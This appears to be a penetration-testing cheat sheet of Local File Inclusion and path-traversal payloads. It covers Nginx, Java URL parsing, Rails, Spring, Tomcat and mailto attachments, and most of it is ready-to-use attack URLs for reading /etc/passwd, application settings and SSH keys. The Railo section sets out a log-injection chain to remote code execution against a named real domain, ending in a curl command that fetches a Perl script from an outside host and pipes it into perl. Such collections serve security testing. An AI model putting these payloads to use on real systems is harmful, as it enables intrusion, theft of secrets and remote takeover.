Local File Inclusion
LFI (Local File Inclusion)¶
Payloads¶
https://ac331fc21e54319d80214e2200bf00e6.web-security-academy.net/image?filename=....//....//....//etc/passwd
https://ac4e1f341f197cda8051248900f6006d.web-security-academy.net/image?filename=..%252f..%252f..%252f..%252fetc%2fpasswd
https://ac671fa41f1739d7804a4fc7004e001f.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg
Polyglot URL path:¶
|---linux url----|
new URL("file:///etc/passwd?/../../Windows/win.ini")
|-------windows unc---------------|
Rely on getPath() under Windows:
URL base = new URL("file:///C:/Windows/temp/");
URL url = new URL(base, "file?/../../win.ini");
Rely on normalization of getFile() or toExternalForm() under Linux:
URL base = new URL("file:///tmp/");
URL url = new URL(base, "../etc/passwd?/../../tmp/file");
Nginx¶
Off by slash¶
When using the configuration below it is possible to use LFI to access secret files and folders.
location /static {
alias /home/app/static/;
}
This loads the file from /home/app/settings.py
http://127.0.0.1/static../settings.py
Finding the problem:
| HTTP Code | URL |
|---|---|
| 200 | http://target/assets/app.js |
| 403 | http://target/assets/ |
| 404 | http://target/assets/../settings.py |
| 403 | http://target/assets../ |
| 200 | http://target/assets../static/app.js |
| 200 | http://target/assets../settings.py |
Ruby¶
Grails¶
..\Q/\E = ../
Railo admin console¶
- Get to admin console with
https://login.getbynder.com/..;/railo-context/admin/web.cfm - Change 404 error page to
/railo-context/../logs/exception.log - Make request
https://login.getbynder.com/..;/railo-context/<cfoutput> <cfexecute name='/bin/bash' arguments='#Form.shell#' timeout='10' variable='output'> </cfexecute>#output#</cfoutput>.cfm - View 404 error page that is parsed with the new log injection.
curl https://login.getbynder.com/..;/railo-context/foo.cfm -d 'SHELL=-c "curl orange.tw/bc.pl | perl -"'
CVE-2018-3760¶
Attack URLs:
http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/etc/passwd
http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/tmp/evil.erb%3ftype=text/plain
Spring¶
CVE-2018-1271¶
Attack URL:
http://0:8080/spring-rabbit-stock/static/%255c%255c%255c%255c%255c%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini
Input and Output:
| / |
| /../ |
| /foo/ |
| /foo/ |
| /foo/ |
Tomcat¶
Parent Directory:
http://example.com/portal/..;/manager/html
MailTo¶
Payloads:
mailto:[email protected]?attach=imap:///fetch>UID>/INBOX>1
mailto:[email protected]?attach=~/.ssh/rsa_id